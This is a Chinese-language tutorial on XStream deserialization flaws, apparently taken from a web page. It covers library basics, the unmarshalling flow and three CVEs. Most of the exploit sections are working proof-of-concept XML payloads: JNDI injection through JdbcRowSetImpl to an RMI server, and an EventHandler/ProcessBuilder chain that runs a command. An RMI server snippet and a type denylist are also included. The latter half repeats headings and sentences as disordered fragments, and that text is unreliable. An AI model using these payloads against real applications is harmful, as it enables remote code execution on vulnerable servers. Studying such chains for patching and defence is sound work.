XStream漏洞分析与利用教学文档<\/h1>

1. XStream简介<\/h2>

XStream是一个Java库，主要功能是将Java对象与XML相互转换。其特点包括：<\/p>

使用简单，通过默认构造函数即可创建实例<\/li>
支持几乎所有类型的Java对象处理<\/li>

无需实现Serializable接口也能进行序列化\/反序列化<\/li> <\/ul>

基本使用示例<\/h3>

Maven依赖<\/strong>:<\/p>

<dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.thoughtworks.xstream<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>xstream<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.4.4<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>示例1：未实现Serializable接口的类<\/strong><\/p>
public<\/span> class<\/span> Person<\/span> {<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> int<\/span> age;<\/span>
<\/span><\/span>    \/\/ 构造方法、getter\/setter等
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化
<\/span><\/span><\/span><\/span>Person person =<\/span> new<\/span> Person(<\/span>"lucy"<\/span>,<\/span> 22<\/span>);<\/span>
<\/span><\/span>XStream xStream =<\/span> new<\/span> XStream();<\/span>
<\/span><\/span>String xml =<\/span> xStream.<\/span>toXML<\/span>(<\/span>person);<\/span>
<\/span><\/span>\/\/ 输出: <Xstream.Person><name>lucy<\/name><age>22<\/age><\/Xstream.Person>
<\/span><\/span><\/span><\/code><\/pre>示例2：实现Serializable接口的类<\/strong><\/p>
public<\/span> class<\/span> Car<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> int<\/span> price;<\/span>
<\/span><\/span>    private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream s)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        s.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Print Car"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他方法
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化
<\/span><\/span><\/span><\/span>Car car =<\/span> new<\/span> Car(<\/span>"benchi"<\/span>,<\/span> 2000000<\/span>);<\/span>
<\/span><\/span>XStream xStream =<\/span> new<\/span> XStream();<\/span>
<\/span><\/span>String xml =<\/span> xStream.<\/span>toXML<\/span>(<\/span>car);<\/span>
<\/span><\/span>\/\/ 输出: <Xstream.Car serialization="custom">...<\/Xstream.Car>
<\/span><\/span><\/span><\/code><\/pre>反序列化示例<\/strong>:<\/p>
String xml =<\/span> "<Xstream.Car serialization=\"custom\">...<\/Xstream.Car>"<\/span>;<\/span>
<\/span><\/span>XStream xStream =<\/span> new<\/span> XStream();<\/span>
<\/span><\/span>Car car =<\/span> (<\/span>Car)<\/span>xStream.<\/span>fromXML<\/span>(<\/span>xml);<\/span> \/\/ 会调用readObject方法
<\/span><\/span><\/span><\/code><\/pre>2. XStream反序列化机制分析<\/h2>
反序列化流程<\/h3>

开始解析<\/strong>：从TreeUnmarshaller.start()<\/code>开始<\/li>
获取类型<\/strong>：通过HierarchicalStreams.readClassType()<\/code>根据XML标签获取对应的Class对象<\/li>
转换对象<\/strong>：调用convertAnother()<\/code>方法将Class对象转换为Java对象<\/li>
查找转换器<\/strong>：通过converterLookup.lookupConverterForType()<\/code>根据类型寻找合适的Converter<\/li>
实际转换<\/strong>：调用Converter的unmarshal()<\/code>方法解析XML内容<\/li>
<\/ol>
关键点<\/h3>

对于实现了readObject()<\/code>方法的类，XStream会调用该方法<\/li>
XStream为不同类型提供了不同的Converter：

SerializableConverter<\/code>：处理实现了Serializable接口的类<\/li>
ReflectionConverter<\/code>：处理普通Java对象<\/li>
DynamicProxyConverter<\/code>：处理动态代理类<\/li>
TreeSetConverter<\/code>\/TreeMapConverter<\/code>：处理集合类<\/li>
<\/ul>
<\/li>
<\/ul>
3. XStream漏洞汇总<\/h2>
XStream历史上存在多个反序列化漏洞，官方安全公告见：

https:\/\/x-stream.github.io\/security.html<\/a><\/p>
4. CVE-2021-21344分析<\/h2>
影响版本<\/h3>
XStream <= 1.4.15<\/p>
漏洞原理<\/h3>
利用XStream反序列化时，通过构造特定的XML，触发JdbcRowSetImpl的JNDI注入<\/p>
漏洞复现<\/h3>
RMI Server<\/strong>:<\/p>
Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>7777<\/span>);<\/span>
<\/span><\/span>Reference reference =<\/span> new<\/span> Reference(<\/span>"test"<\/span>,<\/span> "test"<\/span>,<\/span> "http:\/\/127.0.0.1:8080\/"<\/span>);<\/span>
<\/span><\/span>ReferenceWrapper wrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>reference);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"exec"<\/span>,<\/span> wrapper);<\/span>
<\/span><\/span><\/code><\/pre>POC XML<\/strong>:<\/p>
<java.util.PriorityQueue<\/span> serialization=<\/span>'custom'<\/span>><\/span>
<\/span><\/span>  <unserializable-parents\/><\/span>
<\/span><\/span>  <java.util.PriorityQueue><\/span>
<\/span><\/span>    <default><\/span>
<\/span><\/span>      <size><\/span>2<\/size><\/span>
<\/span><\/span>      <comparator<\/span> class=<\/span>'sun.awt.datatransfer.DataTransferer$IndexOrderComparator'<\/span>><\/span>
<\/span><\/span>        <indexMap<\/span> class=<\/span>'com.sun.xml.internal.ws.client.ResponseContext'<\/span>><\/span>
<\/span><\/span>          <packet><\/span>
<\/span><\/span>            <message<\/span> class=<\/span>'com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'<\/span>><\/span>
<\/span><\/span>              <dataSource<\/span> class=<\/span>'com.sun.xml.internal.ws.message.JAXBAttachment'<\/span>><\/span>
<\/span><\/span>                <bridge<\/span> class=<\/span>'com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'<\/span>><\/span>
<\/span><\/span>                  <bridge<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.BridgeImpl'<\/span>><\/span>
<\/span><\/span>                    <bi<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'<\/span>><\/span>
<\/span><\/span>                      <jaxbType><\/span>com.sun.rowset.JdbcRowSetImpl<\/jaxbType><\/span>
<\/span><\/span>                      <uriProperties\/><\/span>
<\/span><\/span>                      <attributeProperties\/><\/span>
<\/span><\/span>                      <inheritedAttWildcard<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'<\/span>><\/span>
<\/span><\/span>                        <getter><\/span>
<\/span><\/span>                          <class><\/span>com.sun.rowset.JdbcRowSetImpl<\/class><\/span>
<\/span><\/span>                          <name><\/span>getDatabaseMetaData<\/name><\/span>
<\/span><\/span>                          <parameter-types\/><\/span>
<\/span><\/span>                        <\/getter><\/span>
<\/span><\/span>                      <\/inheritedAttWildcard><\/span>
<\/span><\/span>                    <\/bi><\/span>
<\/span><\/span>                    <tagName\/><\/span>
<\/span><\/span>                    <context><\/span>
<\/span><\/span>                      <marshallerPool<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'<\/span>><\/span>
<\/span><\/span>                        <outer-class<\/span> reference=<\/span>'..\/..'<\/span>\/><\/span>
<\/span><\/span>                      <\/marshallerPool><\/span>
<\/span><\/span>                      <nameList><\/span>
<\/span><\/span>                        <nsUriCannotBeDefaulted><\/span>
<\/span><\/span>                          <boolean><\/span>true<\/boolean><\/span>
<\/span><\/span>                        <\/nsUriCannotBeDefaulted><\/span>
<\/span><\/span>                        <namespaceURIs><\/span>
<\/span><\/span>                          <string><\/span>1<\/string><\/span>
<\/span><\/span>                        <\/namespaceURIs><\/span>
<\/span><\/span>                        <localNames><\/span>
<\/span><\/span>                          <string><\/span>UTF-8<\/string><\/span>
<\/span><\/span>                        <\/localNames><\/span>
<\/span><\/span>                      <\/nameList><\/span>
<\/span><\/span>                    <\/context><\/span>
<\/span><\/span>                  <\/bridge><\/span>
<\/span><\/span>                <\/bridge><\/span>
<\/span><\/span>                <jaxbObject<\/span> class=<\/span>'com.sun.rowset.JdbcRowSetImpl'<\/span> serialization=<\/span>'custom'<\/span>><\/span>
<\/span><\/span>                  <javax.sql.rowset.BaseRowSet><\/span>
<\/span><\/span>                    <default><\/span>
<\/span><\/span>                      <concurrency><\/span>1008<\/concurrency><\/span>
<\/span><\/span>                      <escapeProcessing><\/span>true<\/escapeProcessing><\/span>
<\/span><\/span>                      <fetchDir><\/span>1000<\/fetchDir><\/span>
<\/span><\/span>                      <fetchSize><\/span>0<\/fetchSize><\/span>
<\/span><\/span>                      <isolation><\/span>2<\/isolation><\/span>
<\/span><\/span>                      <maxFieldSize><\/span>0<\/maxFieldSize><\/span>
<\/span><\/span>                      <maxRows><\/span>0<\/maxRows><\/span>
<\/span><\/span>                      <queryTimeout><\/span>0<\/queryTimeout><\/span>
<\/span><\/span>                      <readOnly><\/span>true<\/readOnly><\/span>
<\/span><\/span>                      <rowSetType><\/span>1004<\/rowSetType><\/span>
<\/span><\/span>                      <showDeleted><\/span>false<\/showDeleted><\/span>
<\/span><\/span>                      <dataSource><\/span>rmi:\/\/localhost:7777\/exec<\/dataSource><\/span>
<\/span><\/span>                      <params\/><\/span>
<\/span><\/span>                    <\/default><\/span>
<\/span><\/span>                  <\/javax.sql.rowset.BaseRowSet><\/span>
<\/span><\/span>                  <com.sun.rowset.JdbcRowSetImpl><\/span>
<\/span><\/span>                    <default><\/span>
<\/span><\/span>                      <iMatchColumns><\/span>
<\/span><\/span>                        <int><\/span>-1<\/int><\/span>
<\/span><\/span>                        <!-- 省略其他字段 --><\/span>
<\/span><\/span>                      <\/iMatchColumns><\/span>
<\/span><\/span>                      <strMatchColumns><\/span>
<\/span><\/span>                        <string><\/span>foo<\/string><\/span>
<\/span><\/span>                        <!-- 省略其他字段 --><\/span>
<\/span><\/span>                      <\/strMatchColumns><\/span>
<\/span><\/span>                    <\/default><\/span>
<\/span><\/span>                  <\/com.sun.rowset.JdbcRowSetImpl><\/span>
<\/span><\/span>                <\/jaxbObject><\/span>
<\/span><\/span>              <\/dataSource><\/span>
<\/span><\/span>            <\/message><\/span>
<\/span><\/span>            <satellites\/><\/span>
<\/span><\/span>            <invocationProperties\/><\/span>
<\/span><\/span>          <\/packet><\/span>
<\/span><\/span>        <\/indexMap><\/span>
<\/span><\/span>      <\/comparator><\/span>
<\/span><\/span>    <\/default><\/span>
<\/span><\/span>    <int><\/span>3<\/int><\/span>
<\/span><\/span>    <string><\/span>javax.xml.ws.binding.attachments.inbound<\/string><\/span>
<\/span><\/span>    <string><\/span>javax.xml.ws.binding.attachments.inbound<\/string><\/span>
<\/span><\/span>  <\/java.util.PriorityQueue><\/span>
<\/span><\/span><\/java.util.PriorityQueue><\/span>
<\/span><\/span><\/code><\/pre>漏洞利用链分析<\/h3>

PriorityQueue<\/strong>：利用其readObject()<\/code>方法触发比较操作<\/li>
DataTransferer$IndexOrderComparator<\/strong>：通过比较操作触发后续链<\/li>
JdbcRowSetImpl<\/strong>：最终通过getDatabaseMetaData()<\/code> -> connect()<\/code>触发JNDI注入<\/li>
<\/ol>
5. CVE-2013-7258分析<\/h2>
影响版本<\/h3>
XStream 1.4.x-1.4.6及1.4.10<\/p>
漏洞原理<\/h3>
利用动态代理和EventHandler实现命令执行<\/p>
漏洞复现<\/h3>
POC XML<\/strong>:<\/p>
<sorted-set><\/span>
<\/span><\/span>  <string><\/span>foo<\/string><\/span>
<\/span><\/span>  <dynamic-proxy><\/span>
<\/span><\/span>    <interface><\/span>java.lang.Comparable<\/interface><\/span>
<\/span><\/span>    <handler<\/span> class=<\/span>"java.beans.EventHandler"<\/span>><\/span>
<\/span><\/span>      <target<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>        <command><\/span>
<\/span><\/span>          <string><\/span>cmd<\/string><\/span>
<\/span><\/span>          <string><\/span>\/C<\/string><\/span>
<\/span><\/span>          <string><\/span>calc.exe<\/string><\/span>
<\/span><\/span>        <\/command><\/span>
<\/span><\/span>      <\/target><\/span>
<\/span><\/span>      <action><\/span>start<\/action><\/span>
<\/span><\/span>    <\/handler><\/span>
<\/span><\/span>  <\/dynamic-proxy><\/span>
<\/span><\/span><\/sorted-set><\/span>
<\/span><\/span><\/code><\/pre>替代POC<\/strong>:<\/p>
<tree-map><\/span>
<\/span><\/span>  <entry><\/span>
<\/span><\/span>    <dynamic-proxy><\/span>
<\/span><\/span>      <interface><\/span>java.lang.Comparable<\/interface><\/span>
<\/span><\/span>      <handler<\/span> class=<\/span>"java.beans.EventHandler"<\/span>><\/span>
<\/span><\/span>        <target<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>          <command><\/span>
<\/span><\/span>            <string><\/span>cmd<\/string><\/span>
<\/span><\/span>            <string><\/span>\/C<\/string><\/span>
<\/span><\/span>            <string><\/span>calc<\/string><\/span>
<\/span><\/span>          <\/command><\/span>
<\/span><\/span>        <\/target><\/span>
<\/span><\/span>        <action><\/span>start<\/action><\/span>
<\/span><\/span>      <\/handler><\/span>
<\/span><\/span>    <\/dynamic-proxy><\/span>
<\/span><\/span>    <string><\/span>good<\/string><\/span>
<\/span><\/span>  <\/entry><\/span>
<\/span><\/span><\/tree-map><\/span>
<\/span><\/span><\/code><\/pre>漏洞利用链分析<\/h3>

TreeSet\/TreeMap<\/strong>：触发比较操作<\/li>
动态代理<\/strong>：代理Comparable接口<\/li>
EventHandler<\/strong>：通过反射调用ProcessBuilder的start方法<\/li>
<\/ol>
6. CVE-2021-21351分析<\/h2>
影响版本<\/h3>
XStream <= 1.4.15<\/p>
漏洞原理<\/h3>
利用XRTreeFrag和SAX2DTM触发JdbcRowSetImpl的JNDI注入<\/p>
漏洞复现<\/h3>
POC XML<\/strong>:<\/p>
<sorted-set><\/span>
<\/span><\/span>  <javax.naming.ldap.Rdn_-RdnEntry><\/span>
<\/span><\/span>    <type><\/span>ysomap<\/type><\/span>
<\/span><\/span>    <value<\/span> class=<\/span>'com.sun.org.apache.xpath.internal.objects.XRTreeFrag'<\/span>><\/span>
<\/span><\/span>      <m__DTMXRTreeFrag><\/span>
<\/span><\/span>        <m__dtm<\/span> class=<\/span>'com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'<\/span>><\/span>
<\/span><\/span>          <m__size><\/span>-10086<\/m__size><\/span>
<\/span><\/span>          <m__mgrDefault><\/span>
<\/span><\/span>            <m__incremental><\/span>false<\/m__incremental><\/span>
<\/span><\/span>            <m__source__location><\/span>false<\/m__source__location><\/span>
<\/span><\/span>            <m__dtms><\/span>
<\/span><\/span>              <null\/><\/span>
<\/span><\/span>            <\/m__dtms><\/span>
<\/span><\/span>            <m__defaultHandler\/><\/span>
<\/span><\/span>          <\/m__mgrDefault><\/span>
<\/span><\/span>          <m__shouldStripWS><\/span>false<\/m__shouldStripWS><\/span>
<\/span><\/span>          <m__indexing><\/span>false<\/m__indexing><\/span>
<\/span><\/span>          <m__incrementalSAXSource<\/span> class=<\/span>'com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'<\/span>><\/span>
<\/span><\/span>            <fPullParserConfig<\/span> class=<\/span>'com.sun.rowset.JdbcRowSetImpl'<\/span> serialization=<\/span>'custom'<\/span>><\/span>
<\/span><\/span>              <javax.sql.rowset.BaseRowSet><\/span>
<\/span><\/span>                <default><\/span>
<\/span><\/span>                  <concurrency><\/span>1008<\/concurrency><\/span>
<\/span><\/span>                  <escapeProcessing><\/span>true<\/escapeProcessing><\/span>
<\/span><\/span>                  <fetchDir><\/span>1000<\/fetchDir><\/span>
<\/span><\/span>                  <fetchSize><\/span>0<\/fetchSize><\/span>
<\/span><\/span>                  <isolation><\/span>2<\/isolation><\/span>
<\/span><\/span>                  <maxFieldSize><\/span>0<\/maxFieldSize><\/span>
<\/span><\/span>                  <maxRows><\/span>0<\/maxRows><\/span>
<\/span><\/span>                  <queryTimeout><\/span>0<\/queryTimeout><\/span>
<\/span><\/span>                  <readOnly><\/span>true<\/readOnly><\/span>
<\/span><\/span>                  <rowSetType><\/span>1004<\/rowSetType><\/span>
<\/span><\/span>                  <showDeleted><\/span>false<\/showDeleted><\/span>
<\/span><\/span>                  <dataSource><\/span>rmi:\/\/localhost:15000\/CallRemoteMethod<\/dataSource><\/span>
<\/span><\/span>                  <listeners\/><\/span>
<\/span><\/span>                  <params\/><\/span>
<\/span><\/span>                <\/default><\/span>
<\/span><\/span>              <\/javax.sql.rowset.BaseRowSet><\/span>
<\/span><\/span>              <com.sun.rowset.JdbcRowSetImpl><\/span>
<\/span><\/span>                <default\/><\/span>
<\/span><\/span>              <\/com.sun.rowset.JdbcRowSetImpl><\/span>
<\/span><\/span>            <\/fPullParserConfig><\/span>
<\/span><\/span>            <fConfigSetInput><\/span>
<\/span><\/span>              <class><\/span>com.sun.rowset.JdbcRowSetImpl<\/class><\/span>
<\/span><\/span>              <name><\/span>setAutoCommit<\/name><\/span>
<\/span><\/span>              <parameter-types><\/span>
<\/span><\/span>                <class><\/span>boolean<\/class><\/span>
<\/span><\/span>              <\/parameter-types><\/span>
<\/span><\/span>            <\/fConfigSetInput><\/span>
<\/span><\/span>            <fConfigParse<\/span> reference=<\/span>'..\/fConfigSetInput'<\/span>\/><\/span>
<\/span><\/span>            <fParseInProgress><\/span>false<\/fParseInProgress><\/span>
<\/span><\/span>          <\/m__incrementalSAXSource><\/span>
<\/span><\/span>          <m__walker><\/span>
<\/span><\/span>            <nextIsRaw><\/span>false<\/nextIsRaw><\/span>
<\/span><\/span>          <\/m__walker><\/span>
<\/span><\/span>          <m__endDocumentOccured><\/span>false<\/m__endDocumentOccured><\/span>
<\/span><\/span>          <m__idAttributes\/><\/span>
<\/span><\/span>          <m__textPendingStart><\/span>-1<\/m__textPendingStart><\/span>
<\/span><\/span>          <m__useSourceLocationProperty><\/span>false<\/m__useSourceLocationProperty><\/span>
<\/span><\/span>          <m__pastFirstElement><\/span>false<\/m__pastFirstElement><\/span>
<\/span><\/span>        <\/m__dtm><\/span>
<\/span><\/span>        <m__dtmIdentity><\/span>1<\/m__dtmIdentity><\/span>
<\/span><\/span>      <\/m__DTMXRTreeFrag><\/span>
<\/span><\/span>      <m__dtmRoot><\/span>1<\/m__dtmRoot><\/span>
<\/span><\/span>      <m__allowRelease><\/span>false<\/m__allowRelease><\/span>
<\/span><\/span>    <\/value><\/span>
<\/span><\/span>  <\/javax.naming.ldap.Rdn_-RdnEntry><\/span>
<\/span><\/span>  <javax.naming.ldap.Rdn_-RdnEntry><\/span>
<\/span><\/span>    <type><\/span>ysomap<\/type><\/span>
<\/span><\/span>    <value<\/span> class=<\/span>'com.sun.org.apache.xpath.internal.objects.XString'<\/span>><\/span>
<\/span><\/span>      <m__obj<\/span> class=<\/span>'string'<\/span>><\/span>test<\/m__obj><\/span>
<\/span><\/span>    <\/value><\/span>
<\/span><\/span>  <\/javax.naming.ldap.Rdn_-RdnEntry><\/span>
<\/span><\/span><\/sorted-set><\/span>
<\/span><\/span><\/code><\/pre>漏洞利用链分析<\/h3>

Rdn$RdnEntry<\/strong>：触发比较操作<\/li>
XRTreeFrag<\/strong>：通过getStringValue()<\/code>触发后续解析<\/li>
SAX2DTM<\/strong>：解析过程中触发JdbcRowSetImpl的setAutoCommit()<\/code><\/li>
JdbcRowSetImpl<\/strong>：通过setAutoCommit()<\/code> -> connect()<\/code>触发JNDI注入<\/li>
<\/ol>
7. 防护措施<\/h2>
XStream通过黑名单机制防护漏洞，如1.4.15中的setupSecurity()<\/code>方法：<\/p>
protected<\/span> void<\/span> setupSecurity<\/span>()<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>securityMapper<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>addPermission<\/span>(<\/span>AnyTypePermission.<\/span>ANY<\/span>);<\/span>
<\/span><\/span>        this<\/span>.<\/span>denyTypes<\/span>(<\/span>new<\/span> String[]{<\/span>
<\/span><\/span>            "java.beans.EventHandler"<\/span>,<\/span>
<\/span><\/span>            "java.lang.ProcessBuilder"<\/span>,<\/span>
<\/span><\/span>            "javax.imageio.ImageIO$ContainsFilter"<\/span>,<\/span>
<\/span><\/span>            "jdk.nashorn.internal.objects.NativeString"<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>        this<\/span>.<\/span>denyTypesByRegExp<\/span>(<\/span>new<\/span> Pattern[]{<\/span>
<\/span><\/span>            LAZY_ITERATORS,<\/span> 
<\/span><\/span>            JAVAX_CRYPTO,<\/span> 
<\/span><\/span>            JAXWS_FILE_STREAM
<\/span><\/span>        });<\/span>
<\/span><\/span>        this<\/span>.<\/span>allowTypeHierarchy<\/span>(<\/span>Exception.<\/span>class<\/span>);<\/span>
<\/span><\/span>        this<\/span>.<\/span>securityInitialized<\/span> =<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>8. 参考资源<\/h2>

XStream安全公告: https:\/\/x-stream.github.io\/security.html<\/a><\/li>
XStream反序列化分析: https:\/\/y4tacker.github.io\/2022\/02\/10\/year\/2022\/2\/XStream反序列化\/<\/a><\/li>
<\/ul>

XStream漏洞分析与利用教学文档<\/h1>

2. XStream反序列化机制分析<\/h2>

3. XStream漏洞汇总<\/h2> XStream历史上存在多个反序列化漏洞，官方安全公告见： https:\/\/x-stream.github.io\/security.html<\/a><\/p>

4. CVE-2021-21344分析<\/h2> 影响版本<\/h3> XStream <= 1.4.15<\/p> 漏洞原理<\/h3> 利用XStream反序列化时，通过构造特定的XML，触发JdbcRowSetImpl的JNDI注入<\/p> 漏洞复现<\/h3> RMI Server<\/strong>:<\/p>

影响版本<\/h3> XStream <= 1.4.15<\/p>

漏洞原理<\/h3> 利用XStream反序列化时，通过构造特定的XML，触发JdbcRowSetImpl的JNDI注入<\/p>

漏洞复现<\/h3> RMI Server<\/strong>:<\/p>

漏洞利用链分析<\/h3> PriorityQueue<\/strong>：利用其readObject()<\/code>方法触发比较操作<\/li> DataTransferer$IndexOrderComparator<\/strong>：通过比较操作触发后续链<\/li>

5. CVE-2013-7258分析<\/h2>

影响版本<\/h3> XStream 1.4.x-1.4.6及1.4.10<\/p>

漏洞原理<\/h3> 利用动态代理和EventHandler实现命令执行<\/p>

漏洞复现<\/h3> POC XML<\/strong>:<\/p>

6. CVE-2021-21351分析<\/h2>

影响版本<\/h3> XStream <= 1.4.15<\/p>

漏洞原理<\/h3> 利用XRTreeFrag和SAX2DTM触发JdbcRowSetImpl的JNDI注入<\/p>

8. 参考资源<\/h2> XStream安全公告: https:\/\/x-stream.github.io\/security.html<\/a><\/li> XStream反序列化分析: https:\/\/y4tacker.github.io\/2022\/02\/10\/year\/2022\/2\/XStream反序列化\/<\/a><\/li> <\/ul>

3. XStream漏洞汇总<\/h2>
XStream历史上存在多个反序列化漏洞，官方安全公告见：
https:\/\/x-stream.github.io\/security.html<\/a><\/p>

影响版本<\/h3>
XStream <= 1.4.15<\/p>

漏洞原理<\/h3>
利用XStream反序列化时，通过构造特定的XML，触发JdbcRowSetImpl的JNDI注入<\/p>

影响版本<\/h3>
XStream 1.4.x-1.4.6及1.4.10<\/p>

漏洞原理<\/h3>
利用动态代理和EventHandler实现命令执行<\/p>

影响版本<\/h3>
XStream <= 1.4.15<\/p>

漏洞原理<\/h3>
利用XRTreeFrag和SAX2DTM触发JdbcRowSetImpl的JNDI注入<\/p>

8. 参考资源<\/h2>

XStream安全公告: https:\/\/x-stream.github.io\/security.html<\/a><\/li>
XStream反序列化分析: https:\/\/y4tacker.github.io\/2022\/02\/10\/year\/2022\/2\/XStream反序列化\/<\/a><\/li> <\/ul>